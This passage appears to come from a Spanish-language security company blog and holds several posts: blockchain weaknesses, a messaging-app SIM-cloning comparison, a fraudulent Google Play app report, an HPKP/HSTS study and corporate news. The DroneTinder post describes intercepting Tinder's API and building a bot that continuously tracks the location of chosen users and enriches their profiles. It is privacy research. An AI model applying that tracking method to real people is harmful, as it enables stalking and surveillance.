autenticidad de una serie de transacciones en bloques. Es decir, vamos a ver cómo blockchain consigue recopilar en un bloque de información un conjunto de transacciones entre usuarios de la red de manera no repudiable y segura. Para ello utiliza el cifrado asimétrico donde cada usuario posee un par de claves pública-privada que le permite garantizar que una transacción ha sido realizada por él. Este proceso en próximas entregas cuando ahondemos en detalle la relación blockchain y las criptomonedas. Debilidades Hemos visto las numerosas virtudes y el cambio tan radical de enfoque que blockchain establece. Pero este compendio de virtudes y capacidades acarrea una serie de condicionantes o debilidades tanto funcionales como operativas derivadas de las propias características de blockchain. Ataque del 51 ¿Es la democratización la mejor solución? Siempre que nadie pueda alterar la opinión de los individuos para imponer su propio interés se podrá llegar a la solución más adecuada para la mayoría. Qué ocurre en nuestro caso si la mayoría de Operarios, es decir el 51%, decide que se va a imprimir solo los comentarios que ellos quieran, ignorando la opinión del resto. En definitiva, la serie de hojas impresas solo contendrían la información que este subgrupo quisiera aceptar, e incluso podrían falsear nuevos datos e inventarse hipotéticos comentarios de individuos ficticios, ya que ellos podrían decidir el aceptar datos erróneos. Pues en eso consiste el ataque del 51. En el caso de los bitcoins, donde los Operarios son mineros que tratan de validar bloques de blockchain (por lo que se les motiva con una recompensa, recordemos), existe el riesgo patente de que el 51% se pongan de acuerdo en confirmar solo las transacciones que ellos deseen (por ejemplo, las que les reporten mayor beneficio), que podrían ser falsas o alteradas para su propio beneficio. Este poder sería absoluto, ya que en cualquier instante de tiempo donde alguien controle el 51% de la capacidad computacional de la red blockchain podría empezar a añadir transacciones de desvío de criptomonedas cuyas transacciones se han realizado de manera legal. Podría anular el trabajo del resto de mineros de la red, rechazando su construcción de nuevos bloques. El panorama actual en bitcoin demuestra que estamos alejados de ese riesgo pero que supone una preocupación real cuanto mayor aumente el interés por las criptomonedas. Distribución actual del pool de minería en bitcoin. Fuente: news.bitcoin.com Lentitud En nuestro ejemplo desde que un individuo hace su comentario hasta que los operarios consensuan su opinión y la imprimen puede pasar un período de tiempo aceptable. Pero a nivel mundial con la cantidad de transacciones que se realizan y que se debe consensuar el 51% de todos los nodos, se puede entender que es un proceso costoso y para nada inmediato. En el caso de bitcoin, los mineros son capaces de aceptar de media un bloque cada diez minutos, eso no garantiza que nuestra transacción esté incluida en ese bloque ni que se vaya a confirmar de manera definitiva. Existe un proceso que no hemos comentado aún que estipula que mientras los nodos de la red consensuan su decisión de aprobar un nuevo bloque, otros se siguen generando simultáneamente. Para solucionar esto, durante la verificación de nodos, no se confirman nuevos bloques hasta que no haya seis confirmaciones posteriores. De esta manera se evita la aceptación de transacciones anómalas ya que su validez habrá sido corroborada con un margen futuro bastante amplio. Por tanto, hasta obtener seis confirmaciones podrían llegar a transcurrir hasta 60 minutos para obtener una confirmación de nuestra transacción. La lentitud de confirmación es la principal lacra actual detectada en los usos de blockchain actuales como bitcoin. Y en un sector tan dinámico como las tecnologías de la información y la gestión financiera este lastre pesará cada vez más. Sin embargo, es curioso ver que el crecimiento del tamaño del blockchain que acumula todo el histórico de transacciones no añade ningún retraso para el global de funcionamiento. Donde el tamaño actual se sitúa por encima de los 100Gb de datos. El proceso de localizar transacciones muy atrás en el tiempo no supone un retraso significativo para los grandes servidores de minería durante el proceso de verificación. Tamaño actual del blockchain Usuarios No podíamos olvidarnos del factor humano dentro de la lista de principales debilidades de blockchain. En última instancia, flotando sobre el océano transaccional del blockchain y bitcoin. Protegiendo sus activos monetarios a través de algún mecanismo de credenciales más o menos resistente, habita el usuario. Con experiencia, interés y capacidad suficiente como para adentrarse en el mundo de las criptomonedas pero con las mismas debilidades propias del individuo, expuesto a vulnerabilidades, malware y acciones de ingeniería social habituales. En la siguiente entrega comenzaremos nuestra andadura por el Bitcoin como moneda. Observando cómo se ha gestado su uso a partir de blockchain y la analizaremos para poder explicar cuál es el verdadero motor que ha conseguido alzarla al status que ostenta actualmente. Marcos Arjona Innovación y laboratorio marcos.arjona@11paths.com *También te puede interesar: Blockchain (I): Más allá del Bitcoin, la Deep Web, el ransomware y la mala fama
27 de febrero de 2017
DroneTinder: Sistema de Espionaje Continuo en Redes Sociales
¿Qué es Tinder? “Tinder es la nueva forma de conocerse. Es como la vida real, pero mejor”. Este es el eslogan de la popular aplicación Tinder. Una red social en la que utilizamos nuestro perfil de Facebook (y nuestro GPS) para conocer gente sin necesidad de movernos de casa. Su uso, cada vez más extendido, está cambiando la forma de relacionarnos. Sin embargo, desde el punto de vista de un analista de ciberseguridad, ¿qué peligros puede tener una aplicación como esta para nuestra privacidad? Con el proyecto DroneTinder, como parte del programa Universidades de ElevenPaths, en colaboración con el Máster en Ciberseguridad de la Universidad de Sevilla, hemos estudiado esta aplicación durante los últimos meses. Descubriendo la API de Tinder Después de instalar la app, iniciamos sesión con nuestra cuenta de Facebook e inmediatamente tenemos nuestro perfil listo para ligar en internet. Aparece una chica. Esta me gusta. Esta no… ¡Vaya! ¡Un match! Podemos empezar a intercambiar mensajes para finalmente conseguir una cita. Si nos ponemos nuestro gorro de hacker, podemos repetir el proceso anterior preguntándonos qué está sucediendo realmente para que hayamos conseguido una cita y si en algún momento hemos puesto en peligro nuestra privacidad. Para ello, usaremos un proxy http con el que estudiar qué información intercambia nuestro dispositivo móvil y el servidor de Tinder. Esta es una técnica muy común para auditar aplicaciones móviles y servicios web. El tráfico va cifrado (menos mal), por lo que además necesitaremos instalar un certificado en nuestro dispositivo para hacernos un ataque man in the middle en toda regla. Empezamos nuestro estudio a ciegas. Con algo de conocimiento sobre el protocolo HTTP, rápidamente aparece en nuestro proxy la primera pista, peticiones a la dirección https://api.gotinder.com. Si filtramos los mensajes intercambiados con este servidor, vemos que existe una API rest con la que nuestro teléfono se comunica. Estudiando estos mensajes en formato JSON, vemos cómo podríamos utilizar la API de Tinder para realizar al menos las siguientes acciones: Actualizar nuestro perfil (biografía, edad, género, género de interés y radio de búsqueda). Actualizar nuestra coordenada GPS. Obtener perfiles recomendados. Obtener detalles de un perfil concreto. Así, podríamos repetir nuestra visita guiada por la aplicación de la siguiente forma: Instalamos la App. Iniciamos sesión en Facebook y conseguimos un token que enviamos al servidor de Tinder, dándole acceso a nuestro perfil, fotos, edad, etc. A continuación el teléfono envía nuestra posición GPS. Solicitamos recomendaciones y Tinder nos envía una ráfaga de perfiles en formato JSON. Hagamos una pausa aquí. En la aplicación se nos muestran fotos y una breve biografía de cada usuario. Sin embargo, ¿qué información nos está enviando Tinder realmente de esos usuarios? Encantado de conocerte, usuario de Tinder. La petición a https://api.gotinder.com/user/recs, debidamente firmada con nuestro token de acceso, nos da la respuesta. A continuación podemos ver un ejemplo de la misma, con algunos campos modificados, porque nosotros sí respetamos la privacidad de los usuarios de Tinder. {
"status": 200,
"results": [
{
"distance_mi": 12,
"common_connections": [],
"connection_count": 12,
"common_likes": [],
"common_interests": [],
“Instagram”: “XXX”,
"uncommon_interests": [],
"common_friends": [],
"content_hash": "2o4igQta6H37C7jtgu1jIQasl1HMlI1riYNFr4FPptRpcX1",
"_id": “XXX”,
"badges": [],
"bio": "",
"birth_date": "1993-01-29T19:04:05.660Z",
"name": “XXX”,
"ping_time": "2017-01-26T17:19:50.017Z",
"photos": [
{
"id": “XXX”,
"url": "http://images.gotinder.com/XXX.jpg",
"processedFiles": [
{
"width": 640,
"height": 640,
"url": "http://images.gotinder.com/XXX.jpg"
},
{
"width": 320,
"height": 320,
"url": “XXX.jpg"
},
{
"width": 172,
"height": 172,
"url": "http://images.gotinder.com/XXX.jpg"
},
{
"width": 84,
"height": 84,
"url": "http://images.gotinder.com/XXX.jpg"
}
]
}
],
"is_traveling": false,
"jobs": [],
"schools": [
{
"id": "1087351381344781",
"name": "Yildiz Technical University"
}
]
"hide_age": false,
"hide_distance": false,
"s_number": 60819127,
"gender": 0,
"birth_date_info": "fuzzy birthdate active, not displaying real birth_date"
},
...
]
}
Pero empezamos a preocuparnos. Analizando esta respuesta, conseguida con tan solo abrir la aplicación, podemos saber la siguiente información de un usuario: Fecha de nacimiento aproximada (birth_date) Cuenta de Instagram Distancia a la que se encuentra de nosotros (distance_mi) La última vez que usó la aplicación (ping_time) Si está moviéndose (is_traveling) ID de usuario Y lo más sorprendente. ¡Todas las fotos están accesible desde direcciones 100% públicas en Internet! Además, conociendo el ID de usuario, descubrimos que podemos obtener su perfil actualizado en todo momento (incluida la distancia a la que está de nosotros) con una petición a https://api.gotinder.com/user/id Llevando a cabo nuestro plan Una vez que sabemos qué información nos puede dar Tinder y cómo conseguirla, podemos diseñar una herramienta con la que conseguir los objetivos de este proyecto. Geolocalizar a un usuario de Tinder en todo momento Para conseguir este objetivo, nos planteamos usar algoritmos de triangulación. Sin embargo, Tinder nos indica una distancia mínima de una milla, ya estemos al lado de nuestro objetivo o a 1.5 millas, por lo que existiría demasiado error. No obstante, sí podríamos mantenernos siempre a una milla de nuestro objetivo, moviéndonos con cierto sentido en el radio al que Tinder nos indica que está el usuario para acercarnos hasta esa distancia mínima. De esta forma, aunque no consigamos una precisión del 100%, sí podemos conocer en qué zona se encuentra nuestro objetivo, por ejemplo, cuándo va a trabajar, qué ruta sigue, si se encuentra en la ciudad, etc. Enriquecer perfiles Gracias a los compañeros de ElevenPaths, Félix Brezo y Yaiza Rubio, podemos utilizar OSRFramework para obtener más información de nuestros objetivos. Esta herramienta se apoya en la idea de que un usuario suele utilizar un mismo seudónimo en múltiples redes sociales y sitios de Internet, por lo que lo utilizaremos para realizar una búsqueda en más de 200 plataformas usando la cuenta de Instagram que aparece en cada perfil de Tinder. Estudiar una zona concreta Con la API de Tinder podemos movernos a donde queramos y saber qué usuarios están allí. Podríamos plantearnos monitorizar una superficie durante meses para después estudiar qué usuarios pasaron por allí, conocer qué directivos de tu compañía están en Tinder, sus fotos, cuándo vienen, cuándo se van, etc. Para ello hemos desarrollado un bot con el que automatizar las peticiones a Tinder, así como una aplicación Web sobre la que poder almacenar y estudiar los datos obtenidos. Esta aplicación nos permite filtrar usuarios de Tinder en una zona concreta, para así obtener el ID de nuestro objetivo y comenzar su geolocalización continua. Además, podemos añadir coordenadas para monitorizar los usuarios que aparecen, realizar búsquedas en todos los perfiles añadidos a nuestra Base de Datos, etc. En el siguiente vídeo podemos ver la herramienta DroneTinder en funcionamiento. Hemos ocultado imágenes y datos personales para proteger la privacidad de los usuarios. Julio García Pérez ElevenPaths Software Developer
20 de febrero de 2017
ElevenPaths y la Cyber Threat Alliance (CTA) colaboramos en el intercambio de información de inteligencia sobre ciberamenazas
ElevenPaths unió fuerzas con otras compañías líderes del sector, como son Check Point, Cisco, Fortinet, Intel Security, Palo Alto y Symantec, en 2015, formando parte de la comunidad de compartición de información de inteligencia sobre ciberamenazas llamada CyberThreat Alliance (CTA). En Enero de 2017 la CyberThreat Alliance se ha constituido como una organización sin ánimo de lucro, y ha anunciado la incorporación del ex coordinador de Ciberseguridad de la Casa Blanca, Michael Daniel, como presidente de la organización. Bajo este contexto, ElevenPaths y la CyberThreat Alliance renovamos y aceleramos nuestro compromiso en el intercambio de información de Ciberseguridad para ayudar proteger mejor a nuestros clientes. Con la combinación de inteligencia colectiva, la CTA tiene como objetivo mejorar la detección de las amenazas más recientes, mejorar las defensas, y con ello proteger mejor a los clientes de los miembros de la alianza. La CTA ha desarrollado un sistema automático de compartición de información, que permite en tiempo real compartir toda clase de Indicadores de Compromiso (IoCs), aportando no solo los indicadores de forma individual sino relacionándolos entre todos y añadiendo contexto de cada amenaza. El sistema permite a los miembros de la alianza disponer de forma inmediata de indicadores enriquecidos frescos, de forma anticipada al resto de la industria, permitiendo una detección temprana mucho antes de que sean publicados en otras fuentes. Cada día se intercambian en la CTA miles de indicadores, con el foco puesto en la relación entre ellos que permiten la creación de contexto, enriqueciendo la información de inteligencia y permitiendo una mejor y más rápida detección de amenazas desconocidas hasta el momento. En ElevenPaths buscamos continuamente crear las mejores soluciones de seguridad para nuestros clientes, apoya las iniciativas de colaboración en la industria de seguridad que permitan entre todos avanzar de forma más rápida en la lucha contra los cibercriminales. ¿Te interesa saber más? Aquí puedes leer el comunicado oficial que ha lanzado la CTA esta semana durante la RSA Conference de San Francisco.
17 de febrero de 2017
Nueva técnica de detección de malware ofimático desarrollada por ElevenPahts es aceptada en la Conference on Information Systemas Security and Privacy (ICISSP)
La última investigación realizada desde el área de innovación y laboratorio de ElevenPaths, enfocada en el uso novedoso de técnicas inteligentes para la detección de malware de macros en documentos ofimáticos, ha sido aceptada para participar en la 3rd International Conference on Information Systems Security and Privacy (ICISSP 17). La conferencia tendrá lugar el próximo mes de febrero en Portugal, donde el equipo presentará los resultados. La International Conference on Information Systems Security and Privacy (ICISSP) es una conferencia anual centrada en los aspectos relacionados con la seguridad y la privacidad de los sistemas de información que intenta reunir los últimos resultados científicos de este campo a nivel global, buscando su agrupación y actuando de punto de encuentro tanto para investigadores como para profesionales del sector. La actual edición, que tendrá lugar en Oporto del 19 al 21 de febrero, coopera al igual que ediciones pasadas con la EEMA (European Association for E-Identity & Security). Además, está patrocinada por la IEEE Systems, Man and Cybernetics Society (IEEE SMC). Las dos últimas elecciones (ICISSP 2015 y ICISSP 2016) fueron celebradas en Francia e Italia. En la investigación que se presentará, se estudia la efectividad de las técnicas de inteligencia artificial en la detección de malware en documentos, analizando las soluciones existentes y mostrando las capacidades del novedoso sistema desarrollado por ElevenPaths. Fruto de la investigación que presentará el equipo, surge un sistema de análisis de documentos centrado la detección de malware preservando la privacidad del usuario. Este sistema ha sido ideado para integrarse con el resto de productos y servicios más representativos desarrollados por ElevenPaths, potenciándolos en materia de seguridad.
13 de febrero de 2017
Tras el escándalo de la supuesta puerta trasera en WhatsApp, analizamos otras apps de mensajería
El 13 de enero de 2017 aparecía en un medio de comunicación inglés la noticia de la existencia de una supuesta puerta trasera en WhatsApp que permitiría espiar la conversaciones. Este supuesto backdoor eludiría el tan publicitado sistema de cifrado punto a punto. Aunque la noticia se viralizó tal como fue anunciada, no tardó en demostrarse que más que un fallo de seguridad se trata de una funcionalidad de la aplicación, cuyo propósito es mejorar su usabilidad y que podamos conversar mediante la aplicación sin muchas trabas. Pero, ¿Qué hace el resto de herramientas de mensajería instantáneas en estos casos? ¿Cómo se comportan? Veamos el resultado de nuestros experimentos. Aunque el incidente ha servido para reflexionar sobre la seguridad de las apps de mensajería y la privacidad en general, el problema es cómo se ha contado la historia. El escenario de ataque propuesto por Tobias Boelter está bastante restringido a un entorno de laboratorio. Requiere del clonado de la SIM de la víctima, y que no se conecte a WhatsApp durante el periodo de tiempo del ataque, como por ejemplo en un vuelo en avión. En este escenario, con la SIM clonada un atacante podría registrarse como la víctima y ver los mensajes que le envíen. La verdad es que no sólo podría ver los mensajes, sino que también podría mandar mensajes a los contactos de la víctima haciéndose pasar por ella. Este escenario ya ha sido presentado en repetidas ocasiones con diferentes sabores, y (en mi opinión), en el caso de que la SIM resulte clonada, que alguien engañe a tus contactos de WhatsApp puede no ser el problema más importante al que te estés enfrentando. Si un atacante consigue duplicar nuestra SIM, puede acceder a multitud de servicios que utilizan el móvil como segundo factor de autenticación o como método para resetear contraseñas. Además, clonar una SIM, dependiendo del país de la víctima no suele ser un proceso fácil. Después de verificar el escenario que proponía Tobias Boelter, nos preguntamos cómo se comportan otras aplicaciones de mensajería instantánea, ¿Qué hace Telegram, Line, WeChat o SnapChat en el escenario de ataque propuesto? Boelter ya adelantó que había analizado Facebook Messenger y Signal además de WhatsApp. En el caso de Facebook Messenger el comportamiento era similar al de WhatsApp, sin embargo, en el caso de Signal los mensajes no se reenviaban al destinatario si el emisor no lo hacía. Telegram Telegram tiene un comportamiento similar a WhatsApp o Facebook Messenger en los chats normales. No así en los chats privados. En ellos actúa de manera similar a Signal, no reenviando automáticamente los mensajes pendientes. Es más, si el atacante quisiera utilizar un chat secreto para hablar con los contactos de la víctima, el atacante debería crear un nuevo chat secreto para poder hablar con otras personas. El caso de Telegram tiene también algunas características de la aplicación que la pueden hacer un poco más peligrosa en el escenario de duplicación de la SIM siempre que no se utilicen los chats secretos. En el caso de que otra persona se registe en Telegram utilizando una SIM duplicada, Telegram no te "expulsa" de la sesión que ya tuvieras abierta como el resto de aplicaciones de mensajería instantánea. Realmente crea dos sesiones: una para el teléfono del atacante y otra para el teléfono de la víctima, aunque sí es cierto que se notifica a la víctima la existencia de esta nueva sesión, para que pueda tomar acciones en caso de no haberla autorizado. Por otra parte, un elemento que podría resultar potencialmente más peligroso que el comportamiento de WhatsApp es que el atacante podrá acceder a todo el histórico de mensajes de los chats no privados que mantuviese la víctima. Los chats secretos no se recargarán y en caso de querer hablar con otra persona por un chat privado, tendría que crear un chat secreto nuevo, lo que puede despertar las sospechas de la otra persona. WeChat El caso de WeChat es un poco diferente, ya que para iniciar sesión en WeChat se solicita una contraseña asociada a tu cuenta, que se puede resetear mediante un SMS. Pero en caso de detectar que el teléfono que está solicitando el reseteo de contraseña y acceso a la plataforma sea diferente al último que se estuviera utilizando WeChat, la aplicación solicita que demuestres que eres el propietario legítimo de la cuenta mediante un test. Si se supera el test (que consiste en algunas preguntas relacionadas con el uso que se ha hecho anteriormente de la propia app), se dispondrá de los mensajes pendientes igual que en el caso de WhatsApp. Pero obviamente con los mecanismos que pone WeChat es más difícil acceder a los mensajes no recibidos de un usuario. Line En el caso de Line, realizando el ataque propuesto por Tobias, se podría registrar un usuario nuevo asociado al número de teléfono que está suplantando. El problema es que este usuario nuevo no tiene la información de contactos ni chats pendientes del usuario. Si el usuario no tuviera asociado un email con el número de teléfono, siempre se crea un nuevo usuario perdiendo la historia de mensajes pendientes. Snapchat El caso de Snapchat es bastante parecido al de Line, permite que el usuario se registre únicamente con un número de teléfono o con un número de teléfono y un email. En caso de no utilizar email, el usuario que realice el ataque será considerado un usuario nuevo, que no verá los snaps pendientes de la víctima ni sus contactos. Viber Lo que comenzó como una aplicación para realizar llamadas de teléfono a través de la app, hace tiempo que añadió la posibilidad de chatear con los contactos, igual que cualquier otra aplicación de mensajería instantánea. En el caso de Viber cuando se registra un usuario se borra todo su historial de mensajes pendientes y contactos, con lo que el ataque planteado no es viable en esta plataforma. BBM Blackberry Messenger utiliza al igual que Line, WeChat o Snapchat un mecanismo de usuario y contraseña además del número de teléfono para registrar a sus usuarios. BBM al contrario que las anteriores, permite resetear la contraseña sin asociarla a una cuenta de correo, lo cual hace más fácil un ataque como el descrito en esta plataforma. Aunque a su vez al contrario que WhatsApp o Facebook Messenger la aplicación no reenvía automáticamente los mensajes pendientes. El usuario que los mandó debe reenviarlos para que el atacante los reciba. Conclusión Como se puede ver tras el análisis de las distintas soluciones, no existe una que sea perfecta y todas cuentan con sus ventajas e inconvenientes. Destacan los test que utiliza WeChat para validar la identidad de un usuario. Recordar que aunque sea necesario clonar una tarjeta SIM, no es imposible a pesar de todas las políticas definidas por las operadoras para impedirlo. Pablo San Emeterio Laboratorio ElevenPaths pablo.sanemeterio@11paths.com
6 de febrero de 2017
Telefónica y Data Warden ofrecen conjuntamente servicios de ciberseguridad avanzada
Ciudad de México, 31 de enero, 2017. El World Economic Forum, vuelve a incluir este año 2017 los ciberataques y las fugas de información en su informe anual sobre los 5 principales riesgos globales, lo que pone de relieve la probabilidad e impacto que pueden tener estos ataques en nuestra economía y en nuestra vida diaria. México ocupa el segundo lugar de América Latina en número de ciberdelitos, sólo por debajo de Brasil, informó Mariano Moral, Vicepresidente B2B de Telefónica México durante la firma del convenio de colaboración que acordó la operadora de telecomunicaciones y Data Warden para brindar servicios de ciberseguridad a diferentes empresas. El directivo explicó que las empresas son una de las principales víctimas de estos delitos y tardan en promedio 6 meses en reestructurar su información. Tan sólo en el rubro de pymes, una de cada cinco empresas sufre algún tipo de ciberataque al año, de las cuales más de la mitad se va a quiebra después de 6 meses del ilícito. Mediante el acuerdo de Telefónica y Data Warden, que integrará el resguardo de la información de los corporativos, se contempla la fusión y ampliación de los servicios de ciberseguridad y seguridad gestionada que cada una de las empresas comercializaba por separado y que a partir de ahora ofrecerán de forma conjunta a sus clientes. Como parte de este convenio, ambas empresas lanzarán de forma conjunta el sistema ZoneWard, un servicio gestionado para la automatización y control de los servicios básicos de red y seguridad contra filtración de información. ZoneWard se despliega en la nube de Telefónica y permite gestionar de forma centralizada los servicios que se entregan a los clientes a través de los recursos del Centro de Operaciones de Seguridad de Telefónica México (SOC). Nuestros Centros de Operaciones de Seguridad (SOC) son centros de excelencia que reúnen plataformas innovadoras, procesos operativos y profesionales de la seguridad que ofrece protección en tiempo real frente a amenazas nuevas y conocidas, permitiendo a las organizaciones reducir los riesgos, reforzar su posición de seguridad y aumentar la flexibilidad empresarial. “Con estas acciones buscamos reforzar nuestra posición en el mercado con un socio que complementa nuestras capacidades en el área de seguridad, rubro en el que estamos apostando a nivel global y local”, puntualizó el Vicepresidente de B2B de Telefónica México. Agregó que “el objetivo es resolver las necesidades de las empresas en materia de seguridad informática, sin importar si son pequeñas, medianas o grandes”. Por su parte Jesús Navarro, CEO de Data Warden, destacó “estamos encantados con la alianza ya que nos permite sumar capacidades para ofrecer un servicio completo a nuestros clientes que les ayuda a proteger y dar continuidad a su negocio. Esta alianza coloca a ambas empresas en una posición estratégica sumamente competitiva, con una oferta ágil e innovadora que combina el portafolio de servicios gestionados y capacidades globales de Telefónica, con la amplia experiencia y capacidad en servicios especializados de seguridad informática que posee Data Warden.”. Con esta alianza, Data Warden se une al programa global de alianzas en ciberseguridad de Telefónica que cuenta con los principales fabricantes y empresas de ciberseguridad a nivel mundial para proteger las infraestructuras y la información de nuestros clientes. Pedro Pablo Pérez, CEO de ElevenPaths, la unidad de Ciberseguridad de Telefónica, señaló que la compañía aportaría a la alianza todas las capacidades de inteligencia digital desarrolladas en los últimos tiempos. “La alianza provee un vehículo de colaboración para compartir información crítica y mejorar la identificación de las amenazas más avanzadas”, dijo. » Descargar nota de prensa “Telefónica y Data Warden ofrecen conjuntamente servicios de ciberseguridad avanzada“
31 de enero de 2017
Una investigación de ElevenPaths destapa varias apps maliciosas en Google Play
Ha hecho pública una investigación conjunta realizada por ElevenPaths y su equipo GReAT en la que se desvela cómo están operando las últimas campañas de apps fraudulentas en Google Play que suscriben a usuarios a números de tarificación especial. Se analiza qué tipo de aplicación utilizan para llamar la atención de las potenciales víctimas, qué tácticas de difusión han utilizado, el código e incluso la infraestructura y paneles de gestión usados. Hace algunos años era bastante sencillo subir un "dialer" (o algún tipo similar de aplicación maliciosa) a Google Play, pero ahora subir estas aplicaciones es cada vez más difícil ya que se han mejorado los mecanismos de detección. Esto ha provocado que muchos grupos se centren en otros repositorios de aplicaciones no oficiales aunque, esto no quiere decir que los repositorios oficiales estén exentos de estas amenazas. De hecho, no hace tanto, un grupo español consiguió subir con éxito una aplicación no oficial del conocido programa de televisión "Gran Hermano". Su éxito de aparecer en Google Play se basa en usar un viejo truco. En primer lugar, subieron una versión limpia que por supuesto pasó los controles de seguridad de Google Play. Algunos días después, actualizaron la aplicación añadiendo nuevas funcionalidades, entre ellas la suscripción a servicios de pago. Este truco es extremadamente simple pero ha resultado ser muy provechoso, ya que la aplicación permaneció alrededor de dos meses disponible en Google Play (desde mediados de Septiembre hasta mediados de Noviembre de 2015). Esta app utilizaba técnicas interesantes y novedosas para gestionar la suscripción fraudulenta y monetizar la infección de víctimas. Este grupo de "programadores" también han intentado algo similar empleando otras fuentes de difusión además de Google Play. Uno de los servicios web usados por esta aplicación exponía un panel de control que mostraba información sobre los "usuarios". En septiembre de 2016, volvieron a intentarlo en Google Play de nuevo, siempre con el reclamo del popular programa de televisión. Este grupo ha tenido bastante éxito subiendo aplicaciones a Google Play, utilizando un tema atractivo como puede ser el programa de televisión "Gran Hermano". España y Polonia han sido dos países tradicionalmente objetivo de este tipo de aplicaciones. Sin embargo, no habíamos visto en estos últimos años ningún grupo que fuera capaz de subir aplicaciones en repositorios legítimos con tanta facilidad. Este tipo de aplicaciones cuyas funcionalidades se encuentran muy cerca de la frontera entre lo que se consideraría un negocio legítimo y una actividad fraudulenta ponen a prueba a los sistemas de detección automática. Esto ocasiona que dichas aplicaciones lleguen a estar disponibles en Google Play, aunque acaben por ser retiradas algún tiempo más tarde. Todos los detalles técnicos en las entradas en inglés y castellano: * https://securelist.lat/blog/moviles/84533/expensive-free-apps/ * https://securelist.com/blog/mobile/77083/expensive-free-apps/
30 de enero de 2017
Nuevo Informe: Los errores más comunes a la hora de implementar HPKP, HSTS y condiciones de preload
Hemos recopilado y visitado dos fuentes diferentes de dominios y páginas web, el top de Alexa de un millón de dominios y Shodan. Los resultados proceden de búsquedas realizadas en noviembre de 2016. Dentro de ese conjunto de dominios, hemos acotado la búsqueda para determinar aquellos que usan HSTS o HPKP sobre HTTPS, e incluso aquellos que combinan diferentes combinaciones en las cabeceras. Tratando de determinar no solo la cantidad sino la "calidad" de la implementación. Solo el 0,02% de los dominios más populares implementan actualmente HPKP de la forma más correcta, y solo el 0,74% hacen lo propio con HSTS. Incluso Whatsapp.com o Facebook.com comenten errores en sus implementaciones. A continuación mostramos un extracto del informe que puede encontrarse aquí. Número de pins A la hora de implementar HPKP es importante respetar el número de pins requerido. A pesar de que los valores recomendados establecen usar entre 3 y 4 pins, algunos dominios usan desde un único pin (quebrantando la RFC) hasta 17, que resulta una clara irregularidad que reduce la eficiencia. Del top de un millón de dominios de Alexa, 282 de un total de 450 usan 2 o 3 pins, lo cual es correcto. Sin embargo 89 (19,8%) dominios usan uno o ninguno, lo que resulta inútil desde el punto de vista del navegador porque lo ignorará. Número de pins del top de un millón de dominios de Alexa que usan HPKP. Qué certificado escoger para realizar los pins A la hora de usar HPKP, la elección del certificado apropiado es una decisión importante. Los administradores pueden usar cualquier pin en la cadena del certificado (root, intermediate o leaf) pero esta decisión afectará directamente a la usabilidad y también al grado de seguridad tanto desde su punto de vista como del usuario. Debe alcanzarse también un balance y equilibrio entre seguridad y mantenimiento a la hora de efectuar el pinning. Pinning del certificado raíz (root) ofrece menos seguridad, pero a su vez es el mecanismo más sencillo para el administrador a la hora de lidiar con HPKP. Esto significa que, mientras que el proveedor no cambie su CA, no se requerirán cambios adicionales, por tanto, será necesario un menor mantenimiento. Aunque, si un atacante obtiene un certificado falso de la misma CA, el navegador no detectaría la diferencia ya que el root sigue siendo el mismo. Pinning del certificado intermedio (intermediate) es la mejor opción, probablemente. El atacante debería obtener un certificado de la misma CA subordinada (sub CA) a la raíz para lograr un ataque “perfecto”. El administrador, por otro lado, puede cambiar su certificado hoja (leaf) mientras que proceda de la misma entidad subordinada sin cambio adicional a la hora de modificar los pins. Pinning del certificado hoja (leaf) es la opción más segura, pero también la más arriesgada. Si el certificado expira por alguna razón o si cambia (concretamente la clave pública), incluso si ha sido emitido por la misma CA o una subordinada, el administrador tiene que modificar los pins o usar el de respaldo. Por otro lado, un atacante no podría crear un certificado válido (salvo que la clave privada haya sido robada) si desea diseñar un escenario “perfecto” para un ataque MiTM. Por tanto, hemos comprobado sobre qué certificados realizan los administradores el pinning, y estos son los resultados. La mayoría de ellos (73,65%) usan el certificado intermedio. Pinning de certificados en la cadena de confianza del top de un millón de dominios de Alexa usando HPKP. Reutilización de pins La reutilización de pins entre los distintos dominios no es una práctica incorrecta. Considerando que la mayoría de los pins usados en HPKP son intermedios y se han fijado sobre sub CAs, es absolutamente normal compartir algunos pins entre los dominios. Pero este proceso supone cierto riesgo. Desde el punto de vista del atacante, conociendo las sub CAs o incluso las CAs raíz que poseen pins, esto podría permitirle planificar un APT específico para ese dominio. Por ejemplo, si un dominio emite su certificado intermedio con una determinada sub CA y realiza el pinning de este certificado, un atacante podría obtener un certificado hoja “rogue” para ese dominio emitido por la misma sub CA, produciendo un escenario MiTM perfecto, ya que el navegador no mostrará ningún mensaje de advertencia. Por tanto, desde el punto de vista del atacante, si puede determinar si el pinning del dominio se ha realizado sobre el certificado intermedio, y además, cual es la sub CA concreta, esto permitiría conocer con mucha mayor precisión el objetivo a alcanzar. Además, si el atacante quiere maximizar su alcance, éste intentaría obtener un certificado “rogue” firmado por esta sub CA más “popular”. El siguiente mapa representa qué certificados (y sus pines) están pineados a más dominios. Esta lista solo muestra los primeros 25. Ya que el protocolo permite saber solo el pin y no el propio certificado, es necesario realizar un "unhash" para conocerlo. Hemos recogido varios millones de certificados y hemos calculado su hash para compararlos con los pines asociados a los dominios. Los resultados muestran cómo el certificado intermedio de Comodo es el certificado más fijado (klO23nT2ehFDXCfx3eHTDRESMz3asj1muO+4aIdjiuY=). Éste posee pins a 40 dominios diferentes de Alexa y Shodan. Mapa de reutilización de pins. Haz clic para aumentar. Precarga Para evitar el problema del TOFU (Trust on first use), se introdujo el mecanismo de “precarga" (preloading). Este trabajo de precarga funciona como una CA raíz incrustada en el navegador. Básicamente es una lista de dominios dispuesta a ser accesible con HSTS desde el primer momento. Esta lista está mantenida por Google y para pertenecer a ella hay que cumplir con ciertas condiciones como son: Tener una cadena de certificados válida y redirigir de HTTP a HTTPS en el mismo host (por supuesto). Servir todos los subdominios usando HTTPS. WWW es obligatorio si existe en el servidor DNS. Servir la cabecera HSTS vía HTTPS con estas propiedades: max-age de al menos 18 semanas (10886400 segundos). includeSubDomains debe ser incluida. preload debe ser incluida. En caso de proporcionar una redirección adicional del sitio HTTPS, se debe usar obligatoriamente la cabecera HSTS (en vez de la que posea la página a la que redirige). Si todas esas condiciones se cumplen, el propietario del dominio podría solicitar la inclusión en la lista de Google aquí: htstpreload.appspot.com y el dominio podrá eventualmente ser incluido en ella. Esta página web permite también comprobar si un dominio satisface o no esas condiciones. Existen un total de 18197 dominios precargados en la lista Chromium (compartida con Firefox). A fecha de diciembre de 2016, solo 2056 dominios del top de un millón de Alexa están en esa lista. Estado de la precarga del top de un millón de dominios de Alexa Funcionalmente, htstpreload.appspot.com proporciona una API pública que permite comprobar las “razones” de por qué un dominio específico debe ser precargado o no. Hemos contrastado el top de un millón de dominios en 